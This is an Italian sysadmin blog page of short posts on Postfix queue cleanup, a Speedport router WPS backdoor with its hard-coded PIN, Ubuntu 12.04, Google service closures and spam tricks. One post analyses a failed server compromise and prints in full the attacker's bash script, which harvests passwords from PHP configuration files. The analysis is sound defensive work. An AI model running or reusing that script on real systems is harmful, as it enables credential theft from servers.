SIAMO GEEK

Autore: Luigi Rosa

  • Postfix: snellire la coda

    Chi gestisce degli MTA ha ben presente il problema dello spam.

    Tra gli effetti collaterali di questo fenomeno ci sono elle code di mail che si riempiono di messaggi inutili. Questo avviene secondo uno scenario tipico: lo spammer invia un messaggio con un mittente farlocco ad un utente che non esiste; il nostro MTA genera diligentemente un NDR e tenta di recapitarlo al presunto mittente del messaggio, ma l’MTA di destinazione rifiuta la connessione, non è raggiungibile o il recapito dà un errore temporaneo (4xx). Risultato: rimangono in coda per dei giorni dei messaggi di nessuna utilità che non fanno altro che sprecare (pochissima) banda e falsare un dato che potrebbe essere utile come sintomo di problemi (il numero dei messaggi non recapitati in coda).

    Questo è un tipico esempio dello scenario descritto sopra:

    $ mailq
----Queue ID----- --Size-- ---Arrival Time---- --Sender/Recipient------
3Vgspm0WfDz30Dy       3152 Mon Apr 30 06:14:56 MAILER-DAEMON
   (connect to h1784190.stratoserver.net[85.214.66.15]:25: Connection refused)
                                               root@h1784190.stratoserver.net

    Si tratta, quindi, di togliere di mezzo i messaggi in coda provenienti da MAILER-DAEMON, a questo scopo basta eseguire questo comando:

    mailq | grep MAILER-DAEMON | awk '{print substr($1,1,16)}' | postsuper -d -

    La dimensione dell’ID è quella di Postfix >= 2.9 con enable_long_queue_ids abilitato. Viene considerato un carattere in più per fare in modo di non cancellare messaggi attivi (‘*’ dopo l’ID) o in hold (‘!’ dopo l’ID).

  • Connettori USB transdimensionali

    I connettori USB occupano almeno una dimensione spaziale in più rispetto alle tre dimensioni note.

    Provate ad inserirlo e non entra.

    Lo ruotate di 180 gradi e non entra.

    Lo ruotate di nuovo di 180 gradi ed entra.

    E ditemi che non è vero.

  • Oltre 100.000 router di Deutsche Telekom vulnerabili

    Oltre 100.000 router Speedport modello W921V, W504V e W723V hanno una backdoor attiva sul wi-fi.

    La funzione WPS del router ha un PIN 12345670 cablato e utilizzabile anche senza la pressione di alcun tasto sull’apparecchio.

    Come se non bastasse, il pin è attivo anche se la funzione WPS viene disattivata. L’unico modo, per ora, per impedire lo sfruttamento della backdoor è di disabilitare il wi-fi sui modelli interessati.

    Gli Speedport sono i router forniti da Deutsche Telekom ai suoi clienti ADSL. (via The Hacker News)

  • Analisi di un tentativo di compromissione

    Analizzare i tentativi di attacco dei server è sempre un’esperienza istruttiva per il SysAdmin.

    Questa notte ho analizzato il tentativo di attacco, abortito per varie ragioni tra cui avere il sistema aggiornato, al server web di un cliente.

    L’attaccante ha sfruttato una vulnerabilità di un vecchio script dimenticato per caricare alcuni file, ma poi non è riuscito ad andare molto più in là.

    Uno di questi file è uno script shell bash che fa una cosa interessante:

    count=0
blankLine=" "
find / -name "*conf*.php" >> PATHS 2> /dev/null
TOTAL=`grep -c . PATHS`
for i in `cat PATHS`;
do
grep -i pass $i > tmp
perl -wne'while(/\x27(.+?)\x27/g){print "$1\n"}' tmp >> pass.tmp
perl -wne'while(/\x22(.+?)\x22/g){print "$1\n"}' tmp >> parole.tmp
count=$[count + 1]
echo -n -e " \r$blankLine\r "
echo -n -e " $count - $TOTAL "
done

    Traducendo in italiano, lo script cerca tutti i file PHP il cui nome contiene conf e poi cerca di estrarre le password registrate in quei file.

  • Ubuntu 12.04 LTS Precise Pangolin

    Nuova versione di Ubuntu, questa volta targata LTS (Long Term Support).

    Di norma le versioni di Ubuntu sono supportate per 18 mesi, questa versione verrà supportata per cinque anni, sia nella versione server sia in quella workstation, a differenza delle precedenti LTS in cui il supporto della versione desktop era limitato a tre anni.

    Questa versione introduce l’HUD (Heads-Up Display) per cercare rapidamente le informazioni sul proprio computer. L’HUD viene richiamato premendo e rilasciando il tasto Alt e scrivendo quello che si sta cercando.

    Altro cambiamento degno di nota è il supporto di IPv6 equiparato ad IPv4: viene considerata attiva anche una connessione priva di IPv4 funzionante, ma con il solo IPv6. (altro…)

  • Ridondanza delle informazioni

    Non esiste organizzazione in cui ogni informazione è registrata una volta sola e pretendere di arrivare a questo utopico obbiettivo è irrealistico e, spesso, improduttivo.

    Però alcune volte le informazioni sono ridondate in maniera non necessaria, con rischi di costi nascosti dovuti alla manutenzione di più archivi e alle conseguenze del disallineamento degli stessi (o l’allineamento è fatto per via algoritmica o non è). In questo scenario si inserisce spesso un irrazionale antagonismo tra uffici (o tra scrivanie dello stesso ufficio) tale per cui un’informazione come un numero di telefono di un cliente diventa un dato custodito più gelosamente del PIN del bancomat.

    (altro…)

  • Pubblicato un file dei sorgenti di VMware ESX

    In un articolo del blog, Iain Mulholland, il direttore del Security Response Center, ha comunicato che è stato pubblicato su Internet il contenuto di un file dei sorgenti di ESX.

    Dalle analisi del file, risulta che il file faccia parte dei sorgenti di ESX del 2003 o del 2004, non sono state fornite altre informazioni in merito al tipo di file o al suo ruolo all’interno della struttura dei sorgenti del software.

    Dal momento che VMware condivide parte del codice sorgente con partner industriali, la parte pubblicata potrebbe essere stata trafugata sfruttando una vulnerabilità nella sicurezza di uno dei partner, sono in corso le indagini per tentare di individuare la fonte esatta.

    ESX è la versione dell’hypervisor abbandonata a partire dalla versione 5.0, che utilizza solamente la versione ESXi, ma non è ancora stato chiarito se il sorgente pubblicato si riferisca all’interfaccia ESX oppure al core del kernel di virtualizzazione, nel qual caso il problema potrebbe interessare anche ESXi. (via CRN)

  • Pulizie di primavera da Google

    Google ha annunciato alcune modifiche nei suoi servizi e la chiusura o lo spostamento di servizi non più utilizzati:

    • Le API subiranno alcune modifiche: alcune verranno ritirate, altre verranno marchiate come deprecated.
    • Il servizio Google Flu Vaccine Finder introdotto nel 2009 per combattere la pandemia di H1N1 negli Stati Uniti viene ceduto a HealthMap e ora si chiama Flu Vaccine Finder.
    • Il servizio Google Related viene cancellato.
    • Dal prossimo 1 giugno termina il supporto di Google Sync for Blackberry, da quel giorno non sarà più possibile scaricare l’applicazione, anche se quelle esistenti continueranno a funzionare.
    • Mobile web app for Google Talk cessa di funzionare, chi lo sta ancora utilizzando può passare all’applicazione nativa per Google Talk o a qualsiasi applicazione compatibile con XMPP.
    • Il servizio di pagamento One Pass è stato disattivato.
    • Il servizio di ricerca dei brevetti non è più un servizio a se stante, ma viene integrato nel motore di ricerca principale, mantenendo comunque la possibilità di fare ricerche avanzate sui brevetti.
    • Il supporto per l’uploader di Picasa basato su WINE viene interrotto, le installazioni attuali continueranno a funzionare, ma non saranno aggiunte altre feature al programma.
    • Picasa Web Albums Uploader for Mac e Picasa Web Albums Plugin for iPhoto non sono più supportati; anche in questo caso, le versioni installate continueranno a funzionare, ma gli utenti sono incoraggiati a passare a Picasa 3.9 for Mac.

  • Olimpiadi porno

    Lo so che questo titolo farà alzare a dismisura le hit di questa pagina, ma non l’ho scelto per questo. 🙂

    Come fa notare Mikko Hypponen (ne avevo bisogno perché non seguo gli eventi sportivi), la trentesima olimpiade estiva che si terrà a Londra espressa, come d’abitudine, in numeri romani contiene la stringa XXX.

    Bloccare quella stringa nel firewall/proxy è semplicemente da pirla, ma so che succederà, specialmente a quelli che metteranno .xxx non sapendo che il sistema interpreta una regex che matcha la stringa xxx preceduta da un qualsiasi carattere.

    Prepariamoci al salto degli ostacoli dei falsi positivi.

  • Cockpit dello shuttle

    Photo by Jon Brack for National Geographic

    National Geographic ha pubblicato un’immagine GigaPan del cockpit del Discovery realizzata da Jon Brack.

    Questa e solamente una delle dodici foto GigaPan realizzate dall’autore. (via BoingBoing)

  • #disperatimai

    Sappiamo tutti la situazione in cui ci troviamo dal punto di vista economico, non farò qui alcun riferimento alla politica e chiedo a chi volesse commentare di astenersi: non è una censura a priori, eventuali commenti politici non verranno cancellati e verranno comunque approvati.

    Siamo geek, ma ci sono molti geek che sono titolari di società, di partire IVA o sono dipendenti di aziende in difficoltà.

    Questa mattina Fabio Tamburini, il direttore di Radio 24, ha pubblicato questo editoriale [MP3] il cui testo proviene dal blog di Simone Spetia:

    La catena dei suicidi è impressionante, un lungo bollettino di una guerra mai dichiarata ma in corso, di cui le istituzioni non sembrano accorgersi. A nessun livello. Scriveteci le vostre storie all’indirizzo mail disperatimai@radio24.it, raccontateci le difficoltà con cui dovete fare i conti. Ne parleremo nei nostri programmi.
    Radio 24 è al vostro fianco, non vi lascia soli.
    La grande crisi sta cambiando la vita di tutti noi. E non è ancora finita. Sono destinate a cambiare abitudini consolidate, il modo di vivere la vita di ogni giorno e di fare impresa. Sono cambiamenti sempre difficili, a volte traumatici che, in molti casi, costringono a fronteggiare momenti drammatici, a fare scelte che lasciano il segno. A volte le difficoltà da affrontare portano alla disperazione per la paura di non farcela, di non essere all’altezza della situazione. La catena dei suicidi è impressionante, un lungo bollettino di una guerra mai dichiarata ma in corso, di cui le istituzioni non sembrano accorgersi. A nessun livello.
    Per questo Radio 24 ha deciso di scendere in campo contro la disperazione, ha deciso di non lasciarvi soli.
    Il primo passo è dare voce agli imprenditori in difficoltà.
    Scriveteci le vostre storie all’indirizzo mail disperatimai@radio24.it, raccontateci le difficoltà con cui dovete fare i conti. Ne parleremo nei nostri programmi.
    Radio 24 è al vostro fianco, non vi lascia soli.

    Togliersi la vita è un gesto estremo, tra tutti i motivi per farlo l’incapacità di pagare le tasse o i debiti è il più insensato, specialmente quando ci sono malfattori che si vantano di evadere o di truffare gli istituti di credito.

    Se conoscete qualcuno in difficoltà non emarginatelo e non fatelo sentire solo: anche una mano sulla spalla, un sorriso, un caffè offerto per avere 5 minuti di sollievo potrebbero fare la differenza.

    Il testo dell’editoriale di Fabio Tamburini viene citato senza intendere alcuna violazione di Copyright.

  • TLD non ASCII utilizzati dagli spammer

    Spammer e assimilati devono inventarsi ogni tipo di trucco per fare in modo che il social engineering funzioni nei confronti delle loro vittime.

    Tra i trucchi utilizzati di recente c’è lo sfruttamento dei nomi a dominio che fanno riferimento a dei ccTLD non ASCII.

    Una ricerca mirata su Google permette di vedere alcuni esempi dello sfruttamento di questa tecnica, in questo caso con il ccTLD non ASCII dello Sri Lanka .இலங்கை scritto in singalese tamil.

    L’utilizzo di questo tipo di ccTLD potrebbe mettere in crisi alcuni filtri di posta elettronica o accesso al web se questi non sono opportunamente aggiornati o il loro funzionamento con questo tipo di TLD non è stato verificato opportunamente.

    In questo quadro si inserisce la prossima approvazione dei gTLD, che non farà altro che complicare la vita a chi utilizza software non aggiornato o con delle regex di validazione limitate o antiquate. (via Mikko Hypponen)